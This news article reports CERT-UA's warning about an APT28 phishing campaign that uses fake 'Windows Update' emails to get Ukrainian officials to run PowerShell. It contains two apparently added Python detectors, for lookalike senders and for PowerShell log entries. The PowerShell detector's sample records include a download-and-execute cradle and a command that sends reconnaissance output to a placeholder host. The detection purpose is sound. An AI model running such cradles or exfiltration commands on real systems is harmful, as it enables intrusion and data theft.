
 1 year ago
source link: https://www.neowin.net/news/cert-ukraine-beware-of-fake-windows-updates-distributed-via-microsoft-outlook-domain-emails/

CERT Ukraine: Beware of fake Windows updates distributed via Microsoft Outlook domain emails

[Image: a red Windows 10 logo and the words "Windows 10 Update"]

The Computer Emergency Response Team of Ukraine (CERT-UA) has issued a warning about a malicious campaign that distributes fake Windows updates by email to officials in Ukrainian government bodies. CERT-UA notes that the senders use addresses on the public outlook.com service, formed from a real employee's surname and initials so that the message appears to come from a departmental system administrator, and that the subject line is typically just "Windows Update", which keeps the lure simple and plausible. CERT-UA attributes the campaign to APT28, an advanced persistent threat group operating from Russia that is also known as Fancy Bear and Pawn Storm, among other names.

In its bulletin, CERT-UA explains (Google-translated to English):

During April 2023, the government computer emergency response team of Ukraine CERT-UA recorded cases of the distribution of e-mails with the subject "Windows Update" among government bodies of Ukraine, sent, apparently, on behalf of system administrators of departments. At the same time, e-mail addresses of senders created on the public service "@outlook.com" can be formed using the employee's real surname and initials.
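The sender pattern CERT-UA describes (a public outlook.com address built from a real employee's surname and initials, paired with the "Windows Update" subject) lends itself to a simple mail-gateway heuristic. The following is an added example, not code from the article or from CERT-UA; the staff surnames, the internal domain `example.gov.ua` and the sample headers are constructed for illustration, since the page does not give the real addresses used.

```python
"""Heuristic check for lookalike senders on public webmail domains.

Added example, not code from the article or from CERT-UA. The staff
directory, internal domain and sample headers are constructed for
illustration; the campaign's real sender addresses are not on the page.
"""
import re
from email.utils import parseaddr

# Constructed directory of staff surnames (hypothetical, not from the bulletin).
STAFF_SURNAMES = {"shevchenko", "kovalenko", "bondarenko"}
# Assumed internal mail domain for the organisation being protected.
INTERNAL_DOMAINS = {"example.gov.ua"}
# Public webmail services an internal administrator would not send from.
FREEMAIL_DOMAINS = {"outlook.com", "hotmail.com", "gmail.com"}
# Subject line used by the campaign according to the bulletin.
LURE_SUBJECTS = {"windows update"}


def classify_sender(from_header, subject, surnames=STAFF_SURNAMES,
                    internal=INTERNAL_DOMAINS, freemail=FREEMAIL_DOMAINS):
    """Return (verdict, reasons) for one message.

    verdict is "internal" (sender on our own domain), "suspicious"
    (public webmail sender that borrows a staff surname or the lure
    subject) or "ok".
    """
    display, addr = parseaddr(from_header)
    local, _, domain = addr.rpartition("@")
    domain = domain.lower()
    if domain in internal:
        return "internal", []

    reasons = []
    if domain in freemail:
        reasons.append("sender is on a public webmail domain")

    # Compare the display name and the local part against known surnames.
    # Punctuation is replaced by spaces so that "shevchenko.ov" and
    # "Shevchenko O.V." are both reduced to the same tokens.
    haystack = re.sub(r"[^a-z]", " ", (display + " " + local).lower())
    matched = sorted(s for s in surnames if s in haystack)
    if matched:
        reasons.append(f"display name or address uses staff surname '{matched[0]}'")

    if subject.strip().lower() in LURE_SUBJECTS:
        reasons.append("subject matches the campaign lure")

    # The bulletin's pattern: public webmail plus a borrowed surname and/or
    # the lure subject. Freemail alone is not enough to flag a message.
    if domain in freemail and len(reasons) >= 2:
        return "suspicious", reasons
    return "ok", reasons


if __name__ == "__main__":
    # Constructed headers, not taken from the campaign.
    samples = [
        ('"Shevchenko O.V." <shevchenko.ov@outlook.com>', "Windows Update"),
        ('"Shevchenko O.V." <o.shevchenko@example.gov.ua>', "Windows Update"),
        ("Newsletter <news@gmail.com>", "Weekly digest"),
    ]
    for hdr, subj in samples:
        print(hdr, "->", classify_sender(hdr, subj))
```

The check deliberately treats a freemail sender on its own as "ok": plenty of legitimate external correspondents use outlook.com, and it is the combination with a borrowed staff surname or the campaign's subject line that reproduces what the bulletin describes. A real gateway would also compare the display name against the directory's full names and transliterations rather than a bare surname list.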

As for how the payload is delivered, CERT-UA explains that the email itself carries the instructions that make the attack succeed: the message includes screenshots (reproduced in the bulletin) that walk the recipient through running a PowerShell command by hand, so that the victims install the malware on their own systems. That command downloads a further script which, in CERT-UA's words, is "designed to collect basic information about the computer using the 'tasklist', 'systeminfo' commands, and send the received results using HTTP request to the Mocky service API." The campaign does not rely on a software exploit; it depends entirely on the recipient trusting the instructions and executing the command themselves.
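Because both stages run through PowerShell, the natural detection point is PowerShell Script Block Logging (event ID 4104 in the Microsoft-Windows-PowerShell/Operational log): the hand-typed download cradle and the recon-plus-HTTP script each leave a script block behind. The following is an added example, not code from the article or from CERT-UA. The event records and the `ScriptBlockText` values are constructed to resemble the two stages the bulletin describes; they are not the campaign's real commands, the URLs are placeholders, and the logic keys on behaviour (reconnaissance commands combined with an HTTP call) rather than on the Mocky endpoint, so that a change of exfiltration host does not evade it.

```python
"""Flag PowerShell script blocks matching the two stages the bulletin describes.

Added example, not code from the article or from CERT-UA. Events are assumed
to be Script Block Logging records (event ID 4104) already parsed into dicts;
the sample ScriptBlockText values and URLs are constructed, not the real script.
"""
import re

# Stage 1: a one-liner the victim runs that fetches and executes remote code.
DOWNLOAD = re.compile(
    r"(Invoke-WebRequest|Invoke-RestMethod|\biwr\b|\birm\b|Net\.WebClient|"
    r"DownloadString|DownloadFile|HttpClient)", re.IGNORECASE)
EXECUTE = re.compile(
    r"(\biex\b|Invoke-Expression|Start-Process\s+powershell)", re.IGNORECASE)
# Stage 2: host reconnaissance whose output leaves the machine over HTTP.
RECON = re.compile(r"\b(tasklist|systeminfo)(\.exe)?\b", re.IGNORECASE)
POST = re.compile(
    r"(-Method\s+Post|UploadString|UploadData|UploadValues)", re.IGNORECASE)


def label_script_block(text):
    """Return the list of campaign-stage labels a script block matches."""
    labels = []
    # Download cradle: remote content fetched and handed straight to IEX.
    if DOWNLOAD.search(text) and EXECUTE.search(text):
        labels.append("download-cradle")
    # Recon + exfil: tasklist/systeminfo output sent out by an HTTP request.
    if RECON.search(text) and (DOWNLOAD.search(text) or POST.search(text)):
        labels.append("recon-exfil")
    return labels


def find_suspicious(events):
    """Return {RecordId: labels} for every 4104 event that matches a stage.

    Non-4104 records (module logging, pipeline events) are skipped because
    their payload field is not a whole script block.
    """
    hits = {}
    for ev in events:
        if ev.get("EventID") != 4104:
            continue
        labels = label_script_block(ev.get("ScriptBlockText", ""))
        if labels:
            hits[ev["RecordId"]] = labels
    return hits


# Constructed sample records; none of these is the campaign's actual script.
SAMPLE_EVENTS = [
    {"RecordId": 1, "EventID": 4104,
     "ScriptBlockText": "Get-Service | Where-Object Status -eq 'Running'"},
    {"RecordId": 2, "EventID": 4104,
     "ScriptBlockText": "iex (New-Object Net.WebClient).DownloadString("
                        "'http://update.example.invalid/u.ps1')"},
    {"RecordId": 3, "EventID": 4104,
     "ScriptBlockText": "$out = (tasklist) + (systeminfo); "
                        "Invoke-RestMethod -Uri 'https://api.example.invalid/v3/x' "
                        "-Method Post -Body ($out -join [Environment]::NewLine)"},
    {"RecordId": 4, "EventID": 4103,   # module-logging record, ignored
     "ScriptBlockText": "tasklist; Invoke-WebRequest http://example.invalid"},
    {"RecordId": 5, "EventID": 4104,   # plain download, no execution or recon
     "ScriptBlockText": "Invoke-WebRequest -Uri https://intranet.example.invalid/"
                        "report.csv -OutFile report.csv"},
]

if __name__ == "__main__":
    for record_id, labels in find_suspicious(SAMPLE_EVENTS).items():
        print(f"record {record_id}: {', '.join(labels)}")
```

Record 5 shows the false-positive boundary: an ordinary `Invoke-WebRequest` that saves a file triggers nothing, because neither execution of the fetched content nor reconnaissance output is present. Script Block Logging must be enabled by policy for these events to exist at all, and an operator would normally enrich each hit with the user and process context from the surrounding 4104 fields before alerting.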

You can find CERT-UA's official announcement on its website.
